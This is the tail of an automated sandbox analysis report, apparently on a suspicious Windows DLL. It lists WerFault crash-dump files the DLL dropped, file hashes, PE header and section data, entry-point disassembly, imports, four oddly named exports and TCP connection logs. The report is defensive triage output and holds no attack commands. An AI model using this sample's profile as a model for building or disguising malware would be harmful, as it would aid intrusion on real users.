                                                                                                                        SHA-256:345133599386F0C3CD20ADF62510BA963E25DC1EE938691229F2E011F02CCF15
                                                                                                                        SHA-512:FDC853B50B28C8C90540AB31EBB67DE00BA0BEBE28A69CE469CCECE120487E62648DBF600DFC5F3F58211436306E7276FB12B579879897A84E1DD82E612446B0
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER398A.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:37:57 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):34760
                                                                                                                        Entropy (8bit):2.413605188260289
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:NICEknpSR00ugBtrvUM+sOI36FDZuzLNR2GK0KHnIZ1S1:PEPTN+i6FknX2GQIZ1C
                                                                                                                        MD5:FE3A9A57895A11BBDE379864BD34A1AA
                                                                                                                        SHA1:4660CCA0FFEDA2D9F0CC371B0E756BEBEE1E59CA
                                                                                                                        SHA-256:D3DAFB26C47511DD9A99713F077D9D3503749D9A128772ED3BCE2381FAD98C2B
                                                                                                                        SHA-512:5BF3A8825B1CBFB3F54916D2BE008CEC447763A16AB6A130FD3A78496E6D3DB5C9239FCEF211919354E6B78A3070072128C6A646F42403F0935A44ADB14B951E
                                                                                                                        Malicious:false
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4543.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8412
                                                                                                                        Entropy (8bit):3.6972167795220234
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNiV36p6Yo76njOxp2+Pgmf8zSNz+pry89bLFsflZm:RrlsNiF6p6YU6axp2+Pgmf8zSNcLefy
                                                                                                                        MD5:76872B4F10DAB5548F7C5A90D51D5856
                                                                                                                        SHA1:09F65EB354956B8BDF85D560CB00855480EDA67B
                                                                                                                        SHA-256:7590A90E442F73573110BB00A58EC1D1B8B6E6A7F8C43CA37ECB25682A052922
                                                                                                                        SHA-512:8E63F1986DE67951325919E86C1A72F463AAD58723FE2E3710743EC271304908CF6D0C12B2CF3E2C6AF141782DC7BF36C68EC556A88DC3E01F000761D828CFCC
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>17134</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>....<Revision>1</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>1033</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>1364</Pid>...
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A83.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486599306136513
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2r8fm8M4JCdsTMFl+q8vjsTh4SrSh6d:uITf9EqSN0IJNoKihDWh6d
                                                                                                                        MD5:F5119CC37CD940B95701B555B8405D56
                                                                                                                        SHA1:0F6AEC842D402C511BC033B95CDDE4B721F845CA
                                                                                                                        SHA-256:7B59F212C271180A12BD3B2F239E245B604E7BE9F2F6D4BDD729106A8E0E63E5
                                                                                                                        SHA-512:CAF3A254182B3FA64D7552562B9144A51D49A778C28225E64364D84C9B46F065861BF8E23F693BBCA769AB0D02137C69AB3B75B120D2C2582A245C0804917952
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER4CB4.tmp.dmp
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Mon Oct 11 22:38:06 2021, 0x1205a4 type
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):36016
                                                                                                                        Entropy (8bit):2.4897777598497166
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:xC0HXLDCwswpbRb3TZO2ODjUyrcFl7yuQM8BXEZniQcd9eq:s0771b1WUyrcPSM8Biinyq
                                                                                                                        MD5:559FD5E2D54239F3AF7994402E1F225A
                                                                                                                        SHA1:6F975E163EC0244D6973DCF1058DC318A990BAAF
                                                                                                                        SHA-256:4E9B64C1A7891E3469C235B9E4F92693B6D9451B09FE8BB64D09FA8CFDA9EF47
                                                                                                                        SHA-512:B03EA1DB6B58C4DFCD6BACEBC95BFD282F11D8BE9DF5F0ECF7F32F958898832D290CD6ED3B21D6D8A40C201D81B71625C0E6F27C670708CF7536212D02B6BAAB
                                                                                                                        Malicious:false
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6984.tmp.WERInternalMetadata.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):8416
                                                                                                                        Entropy (8bit):3.697753685979791
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:Rrl7r3GLNi926o6jYy6Yoy6xgmf8zSNz+prfZ89bYbasfyejm:RrlsNis6o6jYy6Y96xgmf8zSNpYb5fL6
                                                                                                                        MD5:BADE93E59CD5720AB99E2508033FE2BB
                                                                                                                        SHA1:9257D92BE814163ED9D6E71DC5F282D0377CD90D
                                                                                                                        SHA-256:E0576D35FA22FA6525FED18862A5C4D3FEF0A7DDA9ABA2DD711D994276920D3C
                                                                                                                        SHA-512:5A8B6AE760691632CBF5B4D45DC7E9DDBA241701D9C2D018A106BB338FCCA751E73FCF7FC789E9AD8C4745FA6D464E7050176AC96293F752BA48C24A4042FF07
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>...<OSVersionInformation>....<WindowsNTVersion>10.0</WindowsNTVersion>....<Build>17134</Build>....<Product>(0x30): Windows 10 Pro</Product>....<Edition>Professional</Edition>....<BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>....<Revision>1</Revision>....<Flavor>Multiprocessor Free</Flavor>....<Architecture>X64</Architecture>....<LCID>1033</LCID>...</OSVersionInformation>...<ProcessInformation>....<Pid>6464</Pid>...
                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E67.tmp.xml
                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4771
                                                                                                                        Entropy (8bit):4.486306505900062
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:cvIwSD8zsdNJgtWI9jZVWSC8B2Q8fm8M4JCdsTMFMDGv+q8vjsTv4SrSld:uITf9EqSN0tJNYvKivDWld
                                                                                                                        MD5:139252536DD735CAA02910CCEF45FF77
                                                                                                                        SHA1:B5EA76ED280C8826367FF09C33596FBD7E73E301
                                                                                                                        SHA-256:D78ACA3358C19DB67E52384ED6AEE82B755A321E0E5963312DBDE4B5DFD8C370
                                                                                                                        SHA-512:5BC27230DB2D3272AD98C0DFE3BB0BA29425ED587B6909065F635691F54F9B0A282092D6970FA70DD72D9A93ADAA3CD7691B1604ADD93176B25CCAEA6EF0EA19
                                                                                                                        Malicious:false
                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1205748" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                        Static File Info

                                                                                                                        General

                                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                        Entropy (8bit):6.669952151971332
                                                                                                                        TrID:
                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                        File name:616412739e268.dll
                                                                                                                        File size:718336
                                                                                                                        MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                        SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                        SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                        SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                        SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a

                                                                                                                        File Icon

                                                                                                                        Icon Hash:74f0e4ecccdce0e4

                                                                                                                        Static PE Info

                                                                                                                        General

                                                                                                                        Entrypoint:0x1003ab77
                                                                                                                        Entrypoint Section:.text
                                                                                                                        Digitally signed:false
                                                                                                                        Imagebase:0x10000000
                                                                                                                        Subsystem:windows gui
                                                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                        Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:6
                                                                                                                        OS Version Minor:0
                                                                                                                        File Version Major:6
                                                                                                                        File Version Minor:0
                                                                                                                        Subsystem Version Major:6
                                                                                                                        Subsystem Version Minor:0
                                                                                                                        Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        push ebp
                                                                                                                        mov ebp, esp
                                                                                                                        cmp dword ptr [ebp+0Ch], 01h
                                                                                                                        jne 00007F9CC8990D67h
                                                                                                                        call 00007F9CC8991852h
                                                                                                                        push dword ptr [ebp+10h]
                                                                                                                        push dword ptr [ebp+0Ch]
                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                        call 00007F9CC8990C0Ah
                                                                                                                        add esp, 0Ch
                                                                                                                        pop ebp
                                                                                                                        retn 000Ch
                                                                                                                        mov ecx, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], ecx
                                                                                                                        pop ecx
                                                                                                                        pop edi
                                                                                                                        pop edi
                                                                                                                        pop esi
                                                                                                                        pop ebx
                                                                                                                        mov esp, ebp
                                                                                                                        pop ebp
                                                                                                                        push ecx
                                                                                                                        ret
                                                                                                                        mov ecx, dword ptr [ebp-10h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990963h
                                                                                                                        jmp 00007F9CC8990D40h
                                                                                                                        mov ecx, dword ptr [ebp-14h]
                                                                                                                        xor ecx, ebp
                                                                                                                        call 00007F9CC8990952h
                                                                                                                        jmp 00007F9CC8990D2Fh
                                                                                                                        push eax
                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                        lea eax, dword ptr [esp+0Ch]
                                                                                                                        sub esp, dword ptr [esp+0Ch]
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [eax], ebp
                                                                                                                        mov ebp, eax
                                                                                                                        mov eax, dword ptr [100AA0D4h]
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        push dword ptr [ebp-04h]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        ret
                                                                                                                        push eax
                                                                                                                        push dword ptr fs:[00000000h]
                                                                                                                        lea eax, dword ptr [esp+0Ch]
                                                                                                                        sub esp, dword ptr [esp+0Ch]
                                                                                                                        push ebx
                                                                                                                        push esi
                                                                                                                        push edi
                                                                                                                        mov dword ptr [eax], ebp
                                                                                                                        mov ebp, eax
                                                                                                                        mov eax, dword ptr [100AA0D4h]
                                                                                                                        xor eax, ebp
                                                                                                                        push eax
                                                                                                                        mov dword ptr [ebp-10h], eax
                                                                                                                        push dword ptr [ebp-04h]
                                                                                                                        mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                        ret
                                                                                                                        push eax
                                                                                                                        inc dword ptr fs:[eax]

                                                                                                                        Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xa8990 | 0x80 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa8a10 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x146000 | 0x53d0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa474c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa47a0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7b000 | 0x1fc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                                                                        Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x79f71 | 0x7a000 | False | 0.510071801358 | data | 6.75463290974 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7b000 | 0x2e586 | 0x2e600 | False | 0.556366871631 | data | 5.60181106954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xaa000 | 0x9b19c | 0x1800 | False | 0.190266927083 | data | 4.15778005426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.reloc | 0x146000 | 0x53d0 | 0x5400 | False | 0.752650669643 | data | 6.72453697464 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Imports

DLL | Import
KERNEL32.dll | LockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
USER32.dll | CreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
MSACM32.dll | acmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                        Exports

Name | Ordinal | Address
BeGrass | 1 | 0x10016020
Fieldeight | 2 | 0x100162f0
Often | 3 | 0x10016510
Townenter | 4 | 0x100167a0

                                                                                                                        Network Behavior

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        Oct 12, 2021 00:38:53.211344957 CEST4434980940.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.242980957 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.243016005 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.243339062 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.244144917 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.244172096 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.335500956 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.335656881 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.338426113 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.338440895 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.338664055 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.341274023 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.387140989 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.390415907 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.390476942 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.390621901 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.390753031 CEST49810443192.168.2.452.97.218.66
                                                                                                                        Oct 12, 2021 00:38:53.390773058 CEST4434981052.97.218.66192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.418211937 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.418239117 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.418344021 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.419348001 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.419358015 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.513693094 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.513875961 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.517349958 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.517384052 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.517685890 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.520750046 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.563143969 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.579423904 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.579551935 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:38:53.579778910 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.580379009 CEST49811443192.168.2.452.97.137.210
                                                                                                                        Oct 12, 2021 00:38:53.580399036 CEST4434981152.97.137.210192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.262428045 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.262460947 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.262573004 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.263724089 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.263744116 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.573945999 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.576354027 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.579360962 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.579386950 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.579838991 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.583082914 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.623146057 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.713731050 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.713819027 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.714051008 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.714366913 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.714411974 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:27.714423895 CEST49827443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:27.714437008 CEST4434982713.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.004852057 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.004887104 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.005809069 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.005831003 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.005836010 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.328645945 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.329854965 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.331669092 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.331696033 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.332318068 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.335145950 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.379168034 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.458651066 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.458770037 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:39:34.459223032 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.459450006 CEST49829443192.168.2.413.82.28.61
                                                                                                                        Oct 12, 2021 00:39:34.459470034 CEST4434982913.82.28.61192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.178584099 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.178627968 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.178735018 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.179379940 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.179399014 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.504352093 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.504453897 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.507618904 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.507637024 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.508140087 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.511157990 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.555151939 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.620575905 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.620656013 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.620711088 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.624624968 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.624658108 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.624672890 CEST49860443192.168.2.440.97.153.146
                                                                                                                        Oct 12, 2021 00:40:08.624681950 CEST4434986040.97.153.146192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.646941900 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.646996021 CEST4434986152.98.207.194192.168.2.4
                                                                                                                        Oct 12, 2021 00:40:08.647104979 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.647937059 CEST49861443192.168.2.452.98.207.194
                                                                                                                        Oct 12, 2021 00:40:08.647959948 CEST4434986152.98.207.194192.168.2.4
